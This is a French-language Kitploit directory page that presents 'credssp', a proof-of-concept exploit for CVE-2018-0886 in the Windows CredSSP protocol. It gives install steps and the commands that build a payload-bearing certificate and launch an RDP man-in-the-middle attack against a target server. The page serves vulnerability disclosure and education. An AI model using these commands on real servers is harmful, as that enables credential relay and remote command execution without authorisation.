Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
credssp — Un code démontrant CVE-2018-0886 | Kitploit
Outils/GitHubGitHub/preempt/credssp
Analyse des VulnérabilitésExploitationMouvement LatéralTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubpreempt/credssp

credssp

Un code démontrant CVE-2018-0886

Voir le dépôt
26757il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

credssp

Ceci est un code de preuve de concept (PoC) pour exploiter CVE-2018-0886. Il ne devrait être utilisé qu'à des fins éducatives. Il repose sur un fork du projet rdpy (https://github.com/preempt/rdpy), permettant également le relais credssp.

Écrit par Eyal Karni, Preempt [email protected]

Compilation

Instructions (Linux)

Si vous utilisez Ubuntu 14, vérifiez le fichier d'installation.. Cela a été testé sur Ubuntu 16.04.

root@kitploit:~
$ git clone https://github.com/preempt/rdpy.git rdpy
$ git clone https://github.com/preempt/credssp.git 
$ cd credssp/install
$ sh install.sh
$ cd ../../rdpy
$ sudo python setup.py install
  • Il suppose un état initial assez propre. Il est préférable de désinstaller d'abord les composants pertinents tels que cryptography, pyopenssl peut-être (pip uninstall cryptography).
  • Une version différente d'openssl doit être installée pour que cela fonctionne. Le script d'installation s'en charge.
  • Veuillez suivre les instructions dans l'ordre décrit.

Exécution de l'exploit

Exportez un certificat adapté à l'authentification serveur à partir de n'importe quel domaine. (Il est utilisé pour RDP https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn781533(v=ws.11))

Pour générer un certificat qui exploite la vulnérabilité (contient la charge utile), utilisez :

root@kitploit:~
$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD 

(ExportedCert est le certificat exporté à l'étape 1. exploitc.pem ,exploitk.pem sont respectivement le certificat généré et la clé privée)

Pour exécuter le script d'attaque :

root@kitploit:~
$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer

Plus de détails figurent dans la section usage des scripts(--help).

Télécharger l’outil